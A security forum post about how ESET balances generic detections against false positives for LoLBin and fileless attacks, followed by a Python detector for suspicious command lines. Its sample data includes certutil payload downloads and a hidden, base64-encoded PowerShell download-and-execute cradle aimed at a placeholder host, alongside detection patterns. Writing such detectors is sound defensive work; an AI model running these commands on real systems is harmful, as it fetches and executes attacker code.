Of LoLBins, 0 Days, and ESET (Part 2)
<blockquote data-quote="Trident" data-source="post: 1084148" data-attributes="member: 99014"><p>Every vendor has a different vision of how their product should work and protect users, although to a large extent modules, features and functions overlap.</p><p>Some focus on reputation, others on machine learning; Eset is heavily focused on accurate, most of the time generic, detections that are machine-generated (documentation is available as well) and on their local emulator for scripts and executables.</p><p>It is possible to activate more aggressive modes for the local emulator, and a cloud emulator, including what they call “sandbox on steroids” (experimental), is available as well for downloads.</p><p></p><p>It is possible to do a lot more to block fileless attacks; for example, I am fairly certain that no admin will start executing complicated scripts nowadays. And even if they do, I am certain they won’t be obfuscated and won’t include commands such as “join”, “split” and many others. I am also confident no admin will attempt to download files via certutil.</p><p></p><p>However, Eset’s Research and Development team most likely hasn’t found the necessary evidence that their current approach doesn’t work and has hence not implemented more generic blocks.</p><p></p><p>Detection (signature) -> generic detection -> heuristic (short and effective logic) -> behavioural profile -> TTP-based behavioural analysis -> policy-based behavioural blocking (lockdown mode)…</p><p>The above progresses to more and more generic methods that can block more attacks and can also create more false positives.</p><p>Home products are more or less “one size fits all” solutions.</p><p>In business environments there are MSSPs that will analyse the solution's weak points as well as the environment and will implement additional security measures.</p></blockquote><p></p>
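As an added illustration, not from Trident's post and not ESET's own logic, the Python below applies the kind of generic command-line checks the post describes (a certutil download, a base64 -EncodedCommand that decodes to a download cradle, and -join / .Split / string-concatenation obfuscation) to a few constructed sample process command lines. The sample lines, the indicator names, the thresholds and the verdict labels are all assumptions chosen for the example; they show how a narrow, near-signature check and a broader obfuscation heuristic sit at different points of the signature-to-behaviour progression the post lists, and why the broader tier is scored rather than blocked outright.

```python
import base64
import re

# Constructed sample command lines (not real telemetry). The encoded
# PowerShell sample is built here so that it decodes correctly.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    "certutil.exe -urlcache -split -f http://example.invalid/payload.exe C:\\Users\\Public\\p.exe",
    f"powershell.exe -nop -w hidden -enc {_ENC}",
    "powershell.exe -c \"$a='I'+'E'+'X'; & $a (('Get-Pro','cess') -join '').Split('x')\"",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "certutil.exe -verify C:\\certs\\server.cer",
]

# Narrow, near-signature check first: certutil fetching over HTTP(S).
CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)
# PowerShell -EncodedCommand and its short aliases, followed by base64.
ENCODED_COMMAND = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Broader obfuscation heuristics (hypothetical indicator names).
OBFUSCATION_TOKENS = {
    "join": re.compile(r"-join\b", re.I),
    "split": re.compile(r"\.split\(|-split\b", re.I),
    "concat": re.compile(r"'[^']*'\s*\+\s*'[^']*'"),
    "char_cast": re.compile(r"\[char\]", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
}
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_COMMAND.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_command_line(cmdline):
    """Return (verdict, indicators) for one process command line.

    verdict is 'block', 'suspicious' or 'allow'. The thresholds are an
    assumption for this example, not any vendor's real policy.
    """
    indicators = []
    if CERTUTIL_DOWNLOAD.search(cmdline):
        indicators.append("certutil_download")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        indicators.append("encoded_command")
        if any(marker in decoded.lower() for marker in CRADLE_MARKERS):
            indicators.append("decoded_download_cradle")
    for name, pattern in OBFUSCATION_TOKENS.items():
        if pattern.search(cmdline):
            indicators.append(name)

    # The narrow checks are specific enough to block on their own.
    if "certutil_download" in indicators or "decoded_download_cradle" in indicators:
        return "block", indicators
    # Single string operators are normal in scripts; two or more in one
    # command line is rare in hand-typed admin usage, so only then flag it.
    if len(set(indicators) & set(OBFUSCATION_TOKENS)) >= 2:
        return "suspicious", indicators
    return "allow", indicators


def triage(command_lines=SAMPLE_COMMAND_LINES):
    """Classify every line and return {cmdline: verdict}."""
    return {line: classify_command_line(line)[0] for line in command_lines}


if __name__ == "__main__":
    for line, verdict in triage().items():
        print(f"{verdict:10s} {line[:70]}")
```

The two benign lines (a script run by path and a certutil certificate check) come out as allow, which is the point of keeping the certutil rule tied to -urlcache plus a URL rather than to the binary name alone; a rule on the binary name alone would be the kind of generic block that creates the false positives the post warns about.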